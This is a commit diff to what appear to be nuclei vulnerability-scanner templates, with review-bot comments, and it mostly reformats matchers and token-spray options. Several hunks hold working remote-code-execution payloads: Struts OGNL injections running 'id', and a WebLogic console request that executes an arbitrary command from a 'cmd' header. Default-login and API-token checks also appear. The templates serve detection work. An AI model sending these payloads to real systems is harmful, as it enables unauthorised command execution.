commit
a21cec6362
|
@ -14,8 +14,3 @@ tags:
|
||||||
|
|
||||||
# files is a list of files to ignore template execution
|
# files is a list of files to ignore template execution
|
||||||
# unless asked for by the user.
|
# unless asked for by the user.
|
||||||
|
|
||||||
files:
|
|
||||||
- "token-spray/"
|
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -11,25 +11,19 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
GET /index.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
|
GET /index.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Connection: close
|
|
||||||
Accept: */*
|
Accept: */*
|
||||||
Accept-Language: en
|
|
||||||
|
|
||||||
- |
|
- |
|
||||||
GET /login.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
|
GET /login.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Connection: close
|
|
||||||
Accept: */*
|
Accept: */*
|
||||||
Accept-Language: en
|
|
||||||
|
|
||||||
- |
|
- |
|
||||||
GET /index.action?§params§%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
|
GET /index.action?{{params}}%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Connection: close
|
|
||||||
Accept: */*
|
Accept: */*
|
||||||
Accept-Language: en
|
|
||||||
|
|
||||||
payloads:
|
payloads:
|
||||||
params:
|
params:
|
||||||
|
@ -40,11 +34,12 @@ requests:
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
- type: status
|
||||||
|
condition: or
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
- 400
|
- 400
|
||||||
condition: or
|
|
||||||
- type: regex
|
- type: regex
|
||||||
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
|
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
|
||||||
part: body
|
|
||||||
|
|
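Review bot: The `regex` matcher in the second hunk, `((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)`, rejects `id` output whose numeric id has five digits or whose account name contains `-` or `_` (for example `www-data`, or `nobody` at 65534), so an affected host running under such an account is reported clean. Since the commit already reorders this matcher block, consider widening it to `- "((u|g)id|groups)=[0-9]{1,5}\\([a-z0-9_-]+\\)"`. The template may continue below the hunk, so check that nothing later relies on the narrower form.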
|
@ -91,15 +91,16 @@ requests:
|
||||||
- webviewer
|
- webviewer
|
||||||
- welcome
|
- welcome
|
||||||
|
|
||||||
attack: sniper
|
|
||||||
stop-at-first-match: true
|
stop-at-first-match: true
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
|
condition: and
|
||||||
words:
|
words:
|
||||||
- "environment variable"
|
- "environment variable"
|
||||||
- "display library search paths"
|
- "display library search paths"
|
||||||
condition: and
|
|
||||||
|
|
|
@ -22,14 +22,16 @@ requests:
|
||||||
|
|
||||||
payloads:
|
payloads:
|
||||||
ids: helpers/wordlists/numbers.txt
|
ids: helpers/wordlists/numbers.txt
|
||||||
attack: sniper
|
|
||||||
threads: 50
|
threads: 50
|
||||||
stop-at-first-match: true
|
stop-at-first-match: true
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "<title>Dashboard</title>"
|
- "<title>Dashboard</title>"
|
||||||
|
|
|
@ -28,8 +28,7 @@ requests:
|
||||||
- |
|
- |
|
||||||
POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1
|
POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
cmd: §exec§
|
cmd: {{exec}}
|
||||||
Connection: close
|
|
||||||
Content-Type: application/x-www-form-urlencoded; charset=utf-8
|
Content-Type: application/x-www-form-urlencoded; charset=utf-8
|
||||||
|
|
||||||
_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession%28%22var%20m%20%3D%20java.lang.Class.forName%28%22weblogic.work.ExecuteThread%22%29.getDeclaredMethod%28%22getCurrentWork%22%29%3B%20var%20currThread%20%3D%20java.lang.Thread.currentThread%28%29%3B%20var%20currWork%20%3D%20m.invoke%28currThread%29%3B%20var%20f2%20%3D%20currWork.getClass%28%29.getDeclaredField%28%22connectionHandler%22%29%3B%20f2.setAccessible%28true%29%3B%20var%20connectionHandler%20%3D%20f2.get%28currWork%29%3B%20var%20f3%20%3D%20connectionHandler.getClass%28%29.getDeclaredField%28%22request%22%29%3B%20f3.setAccessible%28true%29%3B%20var%20request%20%3D%20f3.get%28connectionHandler%29%3B%20var%20command%20%3D%20request.getHeader%28%22cmd%22%29%3B%20var%20response%20%3D%20request.getResponse%28%29%3B%20var%20isWin%20%3D%20java.lang.System.getProperty%28%22os.name%22%29.toLowerCase%28%29.contains%28%22win%22%29%3B%20var%20listCmd%20%3D%20new%20java.util.ArrayList%28%29%3B%20var%20p%20%3D%20new%20java.lang.ProcessBuilder%28%22%22%29%3B%20if%28isWin%29%7Bp.command%28%22cmd.exe%22%2C%20%22%2Fc%22%2C%20command%29%3B%20%7Delse%7Bp.command%28%22%2Fbin%2Fbash%22%2C%20%22-c%22%2C%20command%29%3B%20%7D%20p.redirectErrorStream%28true%29%3B%20var%20process%20%3D%20p.start%28%29%3B%20var%20output%20%3D%20process.getInputStream%28%29%3B%20var%20scanner%20%3D%20new%20java.util.Scanner%28output%29.useDelimiter%28%22%5C%5C%5C%5CA%22%29%3B%20var%20out%20%3D%20scanner.next%28%29%3B%20var%20outputStream%20%3D%20response.getServletOutputStream%28%29%3B%20outputStream.write%28out.getBytes%28%29%29%3B%20outputStream.flush%28%29%3B%20response.getWriter%28%29.write%28%22%22%29%3B%20currThread.interrupt%28%29%3B%22%29
|
_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession%28%22var%20m%20%3D%20java.lang.Class.forName%28%22weblogic.work.ExecuteThread%22%29.getDeclaredMethod%28%22getCurrentWork%22%29%3B%20var%20currThread%20%3D%20java.lang.Thread.currentThread%28%29%3B%20var%20currWork%20%3D%20m.invoke%28currThread%29%3B%20var%20f2%20%3D%20currWork.getClass%28%29.getDeclaredField%28%22connectionHandler%22%29%3B%20f2.setAccessible%28true%29%3B%20var%20connectionHandler%20%3D%20f2.get%28currWork%29%3B%20var%20f3%20%3D%20connectionHandler.getClass%28%29.getDeclaredField%28%22request%22%29%3B%20f3.setAccessible%28true%29%3B%20var%20request%20%3D%20f3.get%28connectionHandler%29%3B%20var%20command%20%3D%20request.getHeader%28%22cmd%22%29%3B%20var%20response%20%3D%20request.getResponse%28%29%3B%20var%20isWin%20%3D%20java.lang.System.getProperty%28%22os.name%22%29.toLowerCase%28%29.contains%28%22win%22%29%3B%20var%20listCmd%20%3D%20new%20java.util.ArrayList%28%29%3B%20var%20p%20%3D%20new%20java.lang.ProcessBuilder%28%22%22%29%3B%20if%28isWin%29%7Bp.command%28%22cmd.exe%22%2C%20%22%2Fc%22%2C%20command%29%3B%20%7Delse%7Bp.command%28%22%2Fbin%2Fbash%22%2C%20%22-c%22%2C%20command%29%3B%20%7D%20p.redirectErrorStream%28true%29%3B%20var%20process%20%3D%20p.start%28%29%3B%20var%20output%20%3D%20process.getInputStream%28%29%3B%20var%20scanner%20%3D%20new%20java.util.Scanner%28output%29.useDelimiter%28%22%5C%5C%5C%5CA%22%29%3B%20var%20out%20%3D%20scanner.next%28%29%3B%20var%20outputStream%20%3D%20response.getServletOutputStream%28%29%3B%20outputStream.write%28out.getBytes%28%29%29%3B%20outputStream.flush%28%29%3B%20response.getWriter%28%29.write%28%22%22%29%3B%20currThread.interrupt%28%29%3B%22%29
|
||||||
|
@ -41,12 +40,12 @@ requests:
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
|
condition: or
|
||||||
regex:
|
regex:
|
||||||
- "root:.*:0:0:"
|
- "root:.*:0:0:"
|
||||||
- "\\[(font|extension|file)s\\]"
|
- "\\[(font|extension|file)s\\]"
|
||||||
condition: or
|
|
||||||
part: body
|
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
|
|
|
@ -31,11 +31,12 @@ requests:
|
||||||
command:
|
command:
|
||||||
- "systeminfo" # Windows
|
- "systeminfo" # Windows
|
||||||
- "lsb_release -a" # Linux
|
- "lsb_release -a" # Linux
|
||||||
attack: sniper
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
|
condition: or
|
||||||
regex:
|
regex:
|
||||||
- "OS Name:.*Microsoft Windows"
|
- "OS Name:.*Microsoft Windows"
|
||||||
- "Distributor ID:"
|
- "Distributor ID:"
|
||||||
|
|
|
@ -22,6 +22,8 @@ requests:
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}"
|
- "{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}"
|
||||||
- "{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}"
|
- "{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}"
|
||||||
|
|
||||||
|
skip-variables-check: true
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
- type: status
|
||||||
|
|
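Review bot: `skip-variables-check: true` is added with no comment, and the key name alone does not say why this template needs it. The reason appears to be that `{{228*'98'}}` in both `path` entries is an expression intended for the target's template engine rather than a nuclei variable, so the unresolved-variable check would otherwise block the request; please confirm. I would add above the key: `# {{228*'98'}} is sent literally to the target; it is not a nuclei variable`. Note that the flag switches the check off for the whole request, so a misspelt real variable in these paths would no longer be caught.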
|
@ -1,4 +1,5 @@
|
||||||
id: grafana-default-login
|
id: grafana-default-login
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Grafana Default Login
|
name: Grafana Default Login
|
||||||
author: pdteam
|
author: pdteam
|
||||||
|
@ -26,7 +27,6 @@ requests:
|
||||||
username:
|
username:
|
||||||
- admin
|
- admin
|
||||||
- admin
|
- admin
|
||||||
|
|
||||||
password:
|
password:
|
||||||
- prom-operator
|
- prom-operator
|
||||||
- admin
|
- admin
|
||||||
|
@ -35,15 +35,13 @@ requests:
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- grafana_session
|
- "grafana_session" # Login cookie
|
||||||
part: header
|
part: header
|
||||||
# Check for 'grafana_session' cookie on valid login in the response header.
|
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
|
||||||
- Logged in
|
|
||||||
part: body
|
part: body
|
||||||
# Check for valid string on valid login.
|
words:
|
||||||
|
- "Logged in" # Logged in keyword
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
|
|
|
@ -20,15 +20,13 @@ requests:
|
||||||
username:
|
username:
|
||||||
- admin
|
- admin
|
||||||
|
|
||||||
attack: sniper
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
|
condition: and
|
||||||
words:
|
words:
|
||||||
- '"redirect": "/htdocs/pages/main/main.lsp"'
|
- '"redirect": "/htdocs/pages/main/main.lsp"'
|
||||||
- '"error": ""'
|
- '"error": ""'
|
||||||
condition: and
|
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
|
|
|
@ -18,22 +18,21 @@ requests:
|
||||||
|
|
||||||
payloads:
|
payloads:
|
||||||
password:
|
password:
|
||||||
- 12345
|
- "12345"
|
||||||
attack: sniper
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
|
condition: and
|
||||||
words:
|
words:
|
||||||
- "session_id="
|
- "session_id="
|
||||||
- "resource"
|
- "resource"
|
||||||
condition: and
|
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
|
||||||
- "Invalid Password"
|
|
||||||
part: body
|
part: body
|
||||||
negative: true
|
negative: true
|
||||||
|
words:
|
||||||
|
- "Invalid Password"
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
|
|
|
@ -23,17 +23,17 @@ requests:
|
||||||
payloads:
|
payloads:
|
||||||
path: helpers/wordlists/adminer-paths.txt
|
path: helpers/wordlists/adminer-paths.txt
|
||||||
|
|
||||||
attack: sniper
|
|
||||||
threads: 50
|
threads: 50
|
||||||
stop-at-first-match: true
|
stop-at-first-match: true
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
|
condition: and
|
||||||
words:
|
words:
|
||||||
- "- Adminer</title>"
|
- "- Adminer</title>"
|
||||||
- "partial(verifyVersion, "
|
- "partial(verifyVersion"
|
||||||
condition: and
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
|
@ -14,12 +14,10 @@ requests:
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Origin: {{BaseURL}}
|
Origin: {{BaseURL}}
|
||||||
Accept-Language: en-US,en;q=0.9
|
Accept-Language: en-US,en;q=0.9
|
||||||
Connection: close
|
|
||||||
|
|
||||||
payloads:
|
payloads:
|
||||||
mdbPaths: helpers/wordlists/mdb-paths.txt
|
mdbPaths: helpers/wordlists/mdb-paths.txt
|
||||||
|
|
||||||
attack: sniper
|
|
||||||
threads: 50
|
threads: 50
|
||||||
max-size: 500 # Size in bytes - Max Size to read from server response
|
max-size: 500 # Size in bytes - Max Size to read from server response
|
||||||
stop-at-first-match: true
|
stop-at-first-match: true
|
||||||
|
|
|
@ -1,4 +1,5 @@
|
||||||
id: prestashop-module-fuzz
|
id: prestashop-module-fuzz
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Prestashop Modules Enumeration
|
name: Prestashop Modules Enumeration
|
||||||
author: meme-lord
|
author: meme-lord
|
||||||
|
@ -16,19 +17,18 @@ requests:
|
||||||
|
|
||||||
payloads:
|
payloads:
|
||||||
path: helpers/wordlists/prestashop-modules.txt
|
path: helpers/wordlists/prestashop-modules.txt
|
||||||
attack: sniper
|
|
||||||
threads: 50
|
|
||||||
|
|
||||||
|
threads: 50
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
|
condition: and
|
||||||
words:
|
words:
|
||||||
- "<module>"
|
- "<module>"
|
||||||
- "<name>"
|
- "<name>"
|
||||||
- "<displayName>"
|
- "<displayName>"
|
||||||
- "<is_configurable>"
|
- "<is_configurable>"
|
||||||
- "</module>"
|
- "</module>"
|
||||||
condition: and
|
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
|
|
|
@ -1,4 +1,5 @@
|
||||||
id: wordpress-plugins-detect
|
id: wordpress-plugins-detect
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: WordPress Plugins Detection
|
name: WordPress Plugins Detection
|
||||||
author: 0xcrypto
|
author: 0xcrypto
|
||||||
|
@ -13,11 +14,8 @@ requests:
|
||||||
|
|
||||||
payloads:
|
payloads:
|
||||||
pluginSlug: helpers/wordlists/wordpress-plugins.txt
|
pluginSlug: helpers/wordlists/wordpress-plugins.txt
|
||||||
attack: sniper
|
|
||||||
threads: 50
|
|
||||||
redirects: true
|
|
||||||
max-redirects: 1
|
|
||||||
|
|
||||||
|
threads: 50
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
- type: status
|
||||||
|
|
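Review bot: Besides `attack: sniper`, the payload hunk also drops `redirects: true` and `max-redirects: 1`, which changes scan behaviour rather than tidying the template. The matcher that follows is `type: status`, and its values are outside the hunk; if it expects 200, a slug path that answers with a redirect (trailing slash, http to https) will stop matching and installed plugins will be missed. If the removal was not intended, keep `redirects: true` and `max-redirects: 1` next to `threads: 50`; if it was, the commit message should say so. The same two keys are removed in the wordpress-themes-detect section that follows.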
|
@ -1,4 +1,5 @@
|
||||||
id: wordpress-themes-detect
|
id: wordpress-themes-detect
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: WordPress Theme Detection
|
name: WordPress Theme Detection
|
||||||
author: 0xcrypto
|
author: 0xcrypto
|
||||||
|
@ -13,11 +14,8 @@ requests:
|
||||||
|
|
||||||
payloads:
|
payloads:
|
||||||
themeSlug: helpers/wordlists/wordpress-themes.txt
|
themeSlug: helpers/wordlists/wordpress-themes.txt
|
||||||
attack: sniper
|
|
||||||
threads: 50
|
|
||||||
redirects: true
|
|
||||||
max-redirects: 1
|
|
||||||
|
|
||||||
|
threads: 50
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
- type: status
|
||||||
|
|
|
@ -14,6 +14,7 @@ requests:
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
|
Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
|
||||||
|
|
||||||
|
threads: 50
|
||||||
payloads:
|
payloads:
|
||||||
path:
|
path:
|
||||||
- /
|
- /
|
||||||
|
@ -63,9 +64,6 @@ requests:
|
||||||
- /webticket/webticketservice.svcabs/
|
- /webticket/webticketservice.svcabs/
|
||||||
- /adfs/services/trust/2005/windowstransport
|
- /adfs/services/trust/2005/windowstransport
|
||||||
|
|
||||||
attack: sniper
|
|
||||||
threads: 50
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
|
|
|
@ -1,15 +1,19 @@
|
||||||
## About
|
## About
|
||||||
|
|
||||||
This directory holds templates that have static API URL endpoints. Use these to test an API token against many API service endpoints. By providing token input using flag, Nuclei will test the token against all known API endpoints within the API templates, and return any successful results. By incorporating API checks as Nuclei Templates, users can test API keys that have no context (i.e., API keys that do not indicate for which API endpoint they are meant).
|
This directory holds templates that have static API URL endpoints. Use these to test an API token against many API service endpoints. By providing token input using flag, Nuclei will test the token against all known API endpoints within the API templates, and return any successful results. By incorporating API checks as Nuclei Templates, users can test API keys that have no context (i.e., API keys that do not indicate for which API endpoint they are meant).
|
||||||
|
|
||||||
## Usage
|
## Usage
|
||||||
You do not need to specify an input URL to test a token against these API endpoints, as the API endpoints have static URLs. However, Nuclei requires an input (specified via `-u` for individual URLs or `-l` for a file containing URLs). Because of this requirement, we simply pass in `-u "null"`. Each template in the `token-spray` directory assumes the input API token will be provided using CLI `var` flag.
|
|
||||||
|
|
||||||
```bash
|
token-spray are **self-contained** template and does not requires URLs as input as the API endpoints have static URLs predefined in the template. Each template in the `token-spray` directory assumes the input API token/s will be provided using CLI `var` flag.
|
||||||
# Run Nuclei specifying all the api templates:
|
|
||||||
|
|
||||||
nuclei -u null -t token-spray/ -var token=thisIsMySecretTokenThatIWantToTest
|
```console
|
||||||
|
# Running token-spray templates against a single token to test
|
||||||
|
nuclei -t token-spray/ -var token=random-token-to-test
|
||||||
|
|
||||||
|
# Running token-spray templates against a file containing multiple new line delimited tokens
|
||||||
|
nuclei -t token-spray/ -var token=file_with_tokens.txt
|
||||||
```
|
```
|
||||||
|
|
||||||
## Credits
|
## Credits
|
||||||
These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. You are welcome to add new templates based on the existing format to cover more APIs.
|
|
||||||
|
|
||||||
|
These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. You are welcome to add new templates based on the existing format to cover more APIs.
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,asana
|
tags: token-spray,asana
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
@ -16,6 +17,6 @@ requests:
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
- type: status
|
||||||
|
negative: true
|
||||||
status:
|
status:
|
||||||
- 401
|
- 401
|
||||||
negative: true
|
|
||||||
|
|
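Review bot: The only matcher visible in the second hunk is `type: status` with `negative: true` on `401`, so every response other than 401 (a 403, a 429 rate limit, a 5xx, a proxy block page) is reported as a valid token. Now that `self-contained: true` lets these templates run without a target, that false-positive rate matters more; a validity check should assert success, for example `status:` `- 200` together with a body word the API returns only to an authenticated caller. The geolocation and places text-search sections later in this commit use the same negative-only pattern (`'error'` with `404`, and `'error_message'`). The request block starts outside the hunk, so the exact endpoint and any extractor are not visible here.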
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,bing,maps,bingmaps
|
tags: token-spray,bing,maps,bingmaps
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,bitly
|
tags: token-spray,bitly
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,buildkite
|
tags: token-spray,buildkite
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,buttercms
|
tags: token-spray,buttercms
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,calendly
|
tags: token-spray,calendly
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,circle,circleci
|
tags: token-spray,circle,circleci
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,deviantart
|
tags: token-spray,deviantart
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- method: POST
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,dropbox
|
tags: token-spray,dropbox
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- method: POST
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,github
|
tags: token-spray,github
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,autocomplete
|
tags: token-spray,google,autocomplete
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,search
|
tags: token-spray,google,search
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,directions
|
tags: token-spray,google,directions
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,elevation
|
tags: token-spray,google,elevation
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,fcm,firebase,cloud,messaging
|
tags: token-spray,google,fcm,firebase,cloud,messaging
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- method: POST
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
